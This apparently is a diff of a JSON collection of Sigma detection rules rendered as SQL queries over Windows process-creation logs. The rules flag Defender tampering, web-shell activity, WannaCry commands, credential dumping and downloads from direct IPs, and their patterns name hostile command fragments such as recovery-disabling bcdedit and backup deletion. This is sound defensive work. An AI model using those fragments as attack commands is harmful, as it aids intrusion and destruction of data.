'4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_cmd_http_appdata.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Malicious Windows Script Components File Execution by TAEF Detection", - "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "status": "test", - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", - "author": "Agro (@agro_sev) oscd.community", + "description": "Detects the creation of a process from Windows task manager", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + "Administrative activity" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\resmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_use_of_te_bin.yml" + "filename": "proc_creation_win_taskmgr_susp_child_process.yml" }, { - "title": "Tap Installer Execution", - "id": "99793437-3e16-439b-be0f-078782cf953d", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Suspicious New Service Creation", + "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "status": "experimental", + "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "title": "New Service Creation Using Sc.EXE", + "id": "85ff530b-261d-48c6-a441-facaa2e81e48", "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of a new service using the \"sc.exe\" utility.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_sc_create_service.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskse.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\111.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR NewProcessName LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "test", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.t1190" ], "falsepositives": [ - "Unlikely" + "Particular web applications may spawn a shell process legitimately" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adfind.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\find.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hostname.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netdom.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 